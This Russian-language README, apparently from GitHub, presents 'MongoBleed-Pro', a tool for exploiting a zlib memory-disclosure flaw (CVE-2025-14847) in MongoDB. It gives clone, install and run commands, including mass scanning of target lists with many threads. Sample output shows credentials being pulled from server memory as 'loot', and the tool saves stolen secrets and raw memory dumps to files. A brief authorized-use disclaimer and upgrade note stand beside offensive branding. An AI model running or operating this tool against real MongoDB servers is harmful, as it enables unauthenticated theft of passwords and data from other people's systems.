
критическая уязвимость раскрытия памяти в обработке сжатия zlib MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.
Продвинутый инструмент эксплуатации утечки памяти MongoDB
Продолжайте учиться | Продолжайте взламывать с CyberTechAjju
MongoBleed-Pro — это продвинутый инструмент эксплуатации CVE-2025-14847, критической уязвимости раскрытия памяти в обработке сжатия zlib в MongoDB. Этот инструмент позволяет исследователям безопасности извлекать конфиденциальные данные из уязвимых экземпляров MongoDB.
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте соответствующее разрешение перед тестированием.
# Клонирование репозитория
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Установка зависимостей
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 ЗАПУСК ПОСЛЕДОВАТЕЛЬНОСТИ ИЗВЛЕЧЕНИЯ ПАМЯТИ 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Цель получена: 192.168.1.100:27017
✓ Порт ОТКРЫТ
☠️ УЯЗВИМО! Начинаем атаку...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ ДОБЫЧА ПОЛУЧЕНА: 🔐 Пароль
→ admin_pass=SuperSecret123
╔══════════════════ ИЗВЛЕЧЕНИЕ ЗАВЕРШЕНО ══════════════════╗
║ 💾 Байт извлечено: 125,847
║ 📦 Уникальных фрагментов: 342
║ 🔑 Секретов найдено: 5
╚══════════════════════════════════════════════════════════╝
| Файл | Описание |
|---|---|
loot_<host>.txt | Извлеченные секреты в читаемом формате |
dump_<host>.bin | Сырой дамп памяти для ручного анализа |
Если вы администратор MongoDB, обновитесь до исправленных версий:
CyberTechAjju
Этот проект лицензирован по лицензии MIT — подробности в файле LICENSE.
Если вы нашли этот инструмент полезным, поставьте ⭐ на GitHub!
「 Продолжайте учиться | Продолжайте взламывать 」
Сделано с ❤️ от CyberTechAjju
| Свойство | Описание |
|---|
| CVE ID | CVE-2025-14847 |
| Тип уязвимости | Раскрытие памяти |
| Затронутые версии | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Причина | Переполнение буфера при чтении в декомпрессии zlib |
| Воздействие | Неаутентифицированная удалённая утечка памяти |
| Аргумент | Описание | По умолчанию |
|---|
--target | Целевой IP/URL | Интерактивный ввод |
--file | Файл со списком целей | None |
--threads | Количество потоков | 50 |
--min-offset | Минимальное смещение памяти | 20 |
--max-offset | Максимальное смещение памяти | 8192 |